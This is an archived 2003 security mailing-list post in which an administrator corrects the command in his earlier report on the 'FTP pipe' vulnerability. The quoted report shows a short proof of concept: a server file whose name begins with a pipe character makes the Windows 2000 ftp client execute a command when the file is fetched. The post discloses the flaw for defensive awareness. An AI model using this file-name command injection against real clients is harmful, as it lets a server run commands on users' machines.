[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability

From: SChoe (schoe@oicinc.com)
Date: 02/25/03

Next message: Raj Mathur: "[Full-Disclosure] Re: Netscape 6/7 crashes by a simple stylesheet..."

Previous message: Steve Wray: "RE: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II"
In reply to: SChoe: "[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: SChoe <schoe@oicinc.com>
To: bugtraq@securityfocus.com
Date: Tue, 25 Feb 2003 12:22:21 -1000 (HST)

Oops. The "touch" syntax is wrong due to my lack of cut-n-paste skills.

touch \|touch\ file <--------Wrong
touch \|touch\ file.txt <--------Right

My bad...

On Tue, 25 Feb 2003, SChoe wrote:

> Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
> From: SChoe <schoe@oicinc.com>
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.netsys.com
> Subject: RE: Multiple Vendor FTP pipe Vulnerability
>
> Securityfocus has a post on its website regarding this vulnerability in
> many ftp clients. I've tested and subsequently validated this issue on
> many of the platforms mentioned in their advisory. They mention
> that the Netscape client on Windows 2000 Professional, but fails to
> mention that the commandline ftp client included with win2k (server and
> pro) are also vulnerable.
>
> <-----------------------snip----------------------->
> # Create file on ftp server for download by client.
> schoe@ftp:/home/ftp$ touch \|touch\ file
>
> # Start commandline ftp client on win2k.
> Microsoft Windows 2000 [Version 5.00.2195]
> <C> Copyright 1985-2000 Microsoft Corp.
>
> C:\ ftp ftp.xxxx.com
> ....
> ftp> get "|touch file.txt"
> ...
> ftp> quit
> 221 Goodbye.
>
> # "C:\file.txt" should now exist.
> <-----------------------snap----------------------->
>
> Multiple Vendor VTP pipe Vulnerability
> ======================================
> www.securityfocus.com/bid/396/info

.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
            | Oceanic Imaging Consultants, Inc. |
            | Phone #: (808) 539.3634 |
            .-----------------------------------.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Raj Mathur: "[Full-Disclosure] Re: Netscape 6/7 crashes by a simple stylesheet..."
Previous message: Steve Wray: "RE: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II"
In reply to: SChoe: "[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: FTP strangeness
... Listing an empty existing directory shouldn't return an error code. ... servers cannot issue a 550 reply to a LIST command. ... As demonstrated more than just VMS ftp servers do the latter - for situations ... In any case an FTP client should comply with the robustness principle of RFC ...
(comp.os.vms)
Re: hmt will not load in FTP client after proxy server problems.
... Now as per the FTP issue. ... the free FTP client FileZilla: ... off the server, and upload new ones. ... index.htm file and the index_files folder that contain the supporting ...
(microsoft.public.publisher.webdesign)
RE: FreeBSD telnetd and Microsoft Internet Explorer
... >Subject: Re: FreeBSD telnetd and Microsoft Internet Explorer ... >> Hitting them with IE 6.0.2800.1106 ftp client I ... >> FTP client being bad. ... >other clients) it crashes. ...
(freebsd-questions)
Re: FreeBSD telnetd and Microsoft Internet Explorer
... > Hitting them with IE 6.0.2800.1106 ftp client I ... > FTP client being bad. ... > on a 6.0 FreeBSD server. ... other clients) it crashes. ...
(freebsd-questions)
RE: ftp clients
... > browser cause of the proxy ... > server but not her ftp client. ... >> mais preciso. ...
(RedHat)